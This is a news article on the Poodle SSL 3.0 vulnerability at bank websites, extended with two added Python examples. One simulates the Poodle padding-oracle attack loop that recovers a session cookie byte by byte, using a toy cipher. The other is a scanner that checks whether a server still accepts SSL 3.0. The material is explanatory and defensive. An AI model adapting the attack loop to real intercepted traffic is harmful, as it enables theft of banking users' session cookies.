You’re Probably Vulnerable to this Threat, But No One has been Hacked Yet

Several financial industry websites, including those run by JPMorgan Chase and Bank of America, are susceptible to a relatively new type of cyber attack that could be used to steal data from online banking users.

The attack goes by the non-threatening name Poodle, an acronym for Padding Oracle On Downgraded Legacy Encryption, but it could have serious repercussions. An attacker positioned between a web server and its visitors, and able to make a visitor's browser send many crafted requests, can decrypt pieces of the supposedly protected session and recover sensitive data such as a customer's session cookie or login credentials.

Although there is a relatively easy fix available, many banks are only just becoming aware of the threat from Poodle.

“The banks I talk to are concerned about this,” said Avivah Litan, vice president at Gartner. “They are making the necessary changes so they avoid the vulnerability. It’s just another big thing bank security departments have to worry about.”

As of Monday morning, many prominent sites remain vulnerable, including bankofamerica.com, chase.com and even federalreserve.gov, according to a scanning tool offered by Qualys, a provider of cloud security and compliance software. (Full disclosure: the scanning tool also says http://www.americanbanker.com is vulnerable to the Poodle attack.)

Bank of America and JPMorgan Chase did not immediately respond to a request for comment, but a spokesman for the Fed emphasized that its website is not subject to a Poodle attack because it doesn’t collect sensitive information.

“The Federal Reserve Board’s public website is used to disseminate public information only,” a Fed spokesperson said. “Because private or sensitive PII data are not exchanged, web sessions are not encrypted. As a result, the Board’s website is SSL3 disabled and therefore not subject to Poodle vulnerability.”

To be sure, no cases of Poodle-enabled crime have been reported yet. But hackers are likely to try to take advantage.

“Statistics say 25% of all flaws that are discovered are getting used by attackers,” said Wolfgang Kandek, the chief technology officer of Qualys. “We just don’t know which 25% — it’s difficult to predict.”

The attack exploits a weakness in the CBC cipher modes of an aging encryption protocol, Secure Sockets Layer version 3.0 (SSL 3.0), and also affects some implementations of SSL's replacement, Transport Layer Security (TLS), that fail to validate padding the way the TLS specification requires. Google researchers disclosed the SSL 3.0 issue in October; the TLS variant was disclosed in early December.

But it comes at a time in which banks and other companies are already facing a staggering series of security vulnerabilities and data breaches. Heartbleed, another vulnerability in website encryption technology (albeit with a catchy name and cool logo), came out in April. The Bash bug, a critical security vulnerability affecting many Linux, Unix and Mac computers, came to light in September. Meanwhile JPMorgan confirmed earlier this year a massive data breach, in which contact information for 76 million households and seven million small businesses was compromised.

Poodle Is High Maintenance

Unlike Heartbleed, for which working exploit scripts were freely circulating within a week of its discovery, Poodle is harder to execute: the attacker has to sit between the victim and the bank's server and also needs a way to make the victim's browser send many crafted requests, on average about 256 for each byte recovered, typically by injecting JavaScript into an unencrypted page the victim loads. It's not going to be the first thing cybercriminals reach for when they want to attack a bank.

To exploit Poodle, hackers “have to do an attack from scratch and write all their routines and they’re kind of lazy,” Litan said. “If you’re a clever programmer, you can do it and maybe someone’s trying.”

But she said that hackers have many other options, such as malicious code that’s already been written to do things like eavesdrop on users’ keystrokes, take over browser sessions, and escalate privileges.

Still, Poodle poses a threat, observers agreed.

“The broken encryption that Poodle attacks leaks data, but it leaks so little of it that a lot of work has to be done to get a bit of data,” said Don Jackson, who is director of threat intelligence at PhishLabs, a provider of cybercrime protection and intelligence services. “If you do it enough and for long enough, you could capture a cookie and use it to connect to a service like online banking, authenticating suddenly as a user, and have access to the bank account.”
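To make concrete how little Poodle leaks per attempt, the following added example (written for this editorial pass, not code from the article or from the researchers it cites) simulates an SSL 3.0-style CBC record layer and runs the Poodle byte-recovery loop against it. The record layer is a simplification: a toy Feistel block cipher stands in for AES, HMAC-SHA1 stands in for the SSL 3.0 MAC, a fresh random IV is drawn for every record, and the cookie value is constructed. What it preserves is the flaw that matters: the receiver checks only the padding length byte, never the padding contents, so substituting the ciphertext block that holds a target byte for the all-padding final block is accepted exactly when that byte's decryption happens to equal 15, which is one attempt in 256.

```python
import hashlib
import hmac
import os

BLOCK = 16     # cipher block size in bytes (AES-sized)
MAC_LEN = 20   # HMAC-SHA1 tag length, stands in for the SSL 3.0 MAC
ENC_KEY = os.urandom(16)
MAC_KEY = os.urandom(16)
SECRET_COOKIE = b"session=s3cr3t-t0k3n"   # constructed value the attacker is after


def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def _f(key, half, rnd):
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]


def toy_encrypt_block(key, block):
    """4-round Feistel permutation on a 16-byte block: a toy stand-in for AES, not secure."""
    l, r = block[:8], block[8:]
    for rnd in range(4):
        l, r = r, _xor(l, _f(key, r, rnd))
    return l + r


def toy_decrypt_block(key, block):
    l, r = block[:8], block[8:]
    for rnd in reversed(range(4)):
        l, r = _xor(r, _f(key, l, rnd)), l
    return l + r


def ssl3_encrypt_record(plaintext):
    """MAC-then-encrypt in CBC, SSL 3.0 style: arbitrary padding bytes plus a final
    length byte. When plaintext+MAC already fills whole blocks, an entire block of
    padding is appended, which is the layout the attack relies on."""
    body = plaintext + hmac.new(MAC_KEY, plaintext, hashlib.sha1).digest()
    pad_len = BLOCK - 1 - len(body) % BLOCK
    body += os.urandom(pad_len) + bytes([pad_len])
    iv = os.urandom(BLOCK)   # simplification: real SSL 3.0 chains IVs across records
    prev, out = iv, b""
    for i in range(0, len(body), BLOCK):
        prev = toy_encrypt_block(ENC_KEY, _xor(body[i:i + BLOCK], prev))
        out += prev
    return iv + out


def ssl3_decrypt_record(record):
    """Returns the plaintext, or None where a real server would send an alert.
    Only the padding length byte is checked; the padding bytes themselves are not."""
    prev, pt = record[:BLOCK], b""
    for i in range(BLOCK, len(record), BLOCK):
        pt += _xor(toy_decrypt_block(ENC_KEY, record[i:i + BLOCK]), prev)
        prev = record[i:i + BLOCK]
    pad_len = pt[-1]
    if pad_len >= BLOCK:
        return None
    body = pt[:-(pad_len + 1)]
    plaintext, tag = body[:-MAC_LEN], body[-MAC_LEN:]
    if not hmac.compare_digest(tag, hmac.new(MAC_KEY, plaintext, hashlib.sha1).digest()):
        return None
    return plaintext


def victim_request(prefix_len, suffix_len):
    """The victim's browser sends a request whose path and body lengths the attacker
    controls (via injected JavaScript); the cookie rides along in the middle."""
    return ssl3_encrypt_record(b"A" * prefix_len + SECRET_COOKIE + b"B" * suffix_len)


def recover_byte(k, max_tries=20000):
    """Recover SECRET_COOKIE[k] by aligning it to the last byte of a block and swapping
    that ciphertext block in for the final all-padding block. Returns (byte, tries)."""
    prefix = (BLOCK - 1 - k) % BLOCK                            # target lands at offset 15
    suffix = -(prefix + len(SECRET_COOKIE) + MAC_LEN) % BLOCK   # plaintext+MAC fill whole blocks
    t = (prefix + k) // BLOCK                                    # ciphertext block holding the byte
    for tries in range(1, max_tries + 1):
        rec = victim_request(prefix, suffix)
        blocks = [rec[i:i + BLOCK] for i in range(0, len(rec), BLOCK)]  # blocks[0] is the IV
        tampered = b"".join(blocks[:-1]) + blocks[t + 1]
        if ssl3_decrypt_record(tampered) is not None:
            # accepted => Dec(C_t)[15] ^ C_{n-1}[15] == 15, and P_t[15] = Dec(C_t)[15] ^ C_{t-1}[15]
            return (BLOCK - 1) ^ blocks[-2][-1] ^ blocks[t][-1], tries
    raise RuntimeError("oracle never accepted; increase max_tries")


def recover_secret():
    """Recover the whole cookie; returns (bytes, total records the victim had to send)."""
    out, total = bytearray(), 0
    for k in range(len(SECRET_COOKIE)):
        b, tries = recover_byte(k)
        out.append(b)
        total += tries
    return bytes(out), total


if __name__ == "__main__":
    secret, total = recover_secret()
    print(secret, "recovered with", total, "records, about", total // len(secret), "per byte")
```

Each recovered byte costs roughly 256 records, which is why the leak is described as slow: in the real attack every one of those records is a separate HTTPS request that the attacker's script coaxes the victim's browser into sending, while the attacker, sitting in the middle, swaps the ciphertext blocks in transit and watches whether the server answers or drops the connection.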

Blocking Poodle

The good news for banks is that Poodle attacks are fairly easy to block.

The first step for a company is to check its websites to see whether they still accept SSL 3.0 connections. Several free scanners check for this, such as https://www.ssllabs.com/ssltest/.

Where a vulnerability exists, the fix is to disable SSL 3.0 on the web servers and load balancers that terminate HTTPS, so that they offer only TLS, and to apply the vendor's patch to any TLS implementation that turned out not to validate padding correctly (a plain protocol-version scan does not find those). Servers and browsers that both support the TLS_FALLBACK_SCSV signal can additionally refuse the forced protocol downgrade that the attack starts with, which helps where SSL 3.0 must be kept on for a few legacy clients.
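A scanner such as SSL Labs answers the SSL 3.0 question remotely, but the check itself is simple enough to reproduce in-house. The following added example (my own code for this editorial pass, not the Qualys tool or anything from the article) sends a bare SSL 3.0 ClientHello and classifies the first record the server returns: a ServerHello carrying version 3.0 means the server still speaks the vulnerable protocol, an alert means it refused. It deliberately avoids Python's ssl module, since current Python and OpenSSL builds no longer offer SSLv3 as a client. The cipher suite list is an assumption (common suites an SSL 3.0 server would have accepted), and the host in the usage call is a placeholder.

```python
import socket
import struct
import sys

SSL3_VERSION = b"\x03\x00"
# Assumed cipher suite list: CBC and RC4 suites an SSL 3.0 server would typically accept.
CIPHER_SUITES = (0x002F, 0x0035, 0x000A, 0x0005)   # AES128-SHA, AES256-SHA, DES-CBC3-SHA, RC4-SHA


def build_ssl3_client_hello(client_random=b"\x00" * 32):
    """Minimal SSL 3.0 ClientHello record: no session to resume, no extensions (SSL 3.0 has none)."""
    suites = b"".join(struct.pack("!H", s) for s in CIPHER_SUITES)
    body = (
        SSL3_VERSION                                # client_version
        + client_random                             # gmt_unix_time + 28 random bytes
        + b"\x00"                                   # session_id length 0
        + struct.pack("!H", len(suites)) + suites   # cipher_suites vector
        + b"\x01\x00"                               # one compression method: null
    )
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body   # HandshakeType client_hello
    return b"\x16" + SSL3_VERSION + struct.pack("!H", len(handshake)) + handshake


def classify_server_response(data):
    """Classify the first record the server sent back to the ClientHello above.
    'sslv3-offered': ServerHello with server_version 3.0 (the server still speaks SSL 3.0)
    'refused':       an alert record, or a hello at some other version
    'unknown':       nothing parseable (connection closed, non-TLS service, truncated read)"""
    if len(data) < 5:
        return "unknown"
    content_type, _major, _minor, length = struct.unpack("!BBBH", data[:5])
    payload = data[5:5 + length]
    if content_type == 0x15:   # alert, e.g. handshake_failure or protocol_version
        return "refused"
    if content_type == 0x16 and len(payload) >= 6 and payload[0] == 0x02:   # ServerHello
        return "sslv3-offered" if payload[4:6] == SSL3_VERSION else "refused"
    return "unknown"


def probe_sslv3(host, port=443, timeout=5.0):
    """Connect, send the ClientHello and classify whatever the server says first."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_ssl3_client_hello())
        try:
            data = sock.recv(4096)
        except (socket.timeout, ConnectionResetError):
            return "unknown"
    return classify_server_response(data)


if __name__ == "__main__":
    host = sys.argv[1] if len(sys.argv) > 1 else "example.com"   # placeholder host
    print(host, probe_sslv3(host))
```

This probe only answers whether SSL 3.0 is still offered. The TLS variant of Poodle lives in how a particular implementation handles malformed padding, so a server that reports "refused" here can still be affected until its TLS stack or load balancer firmware is patched; the SSL Labs test covers that case with a separate padding check.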

The tricky part is timing.

“The problems arise around testing and availability — when do you do this?” Kandek said. “You have to take the system offline for a while and update it, so you have to negotiate that with other areas, as most companies would like to have 24/7 availability. That’s why people are sometimes reluctant to perform these patches.”

On the other hand, most companies have redundancy and failover on critical servers, so IT can test and run the new software on a backup machine before taking it live.

By Penny Crosman from American Banker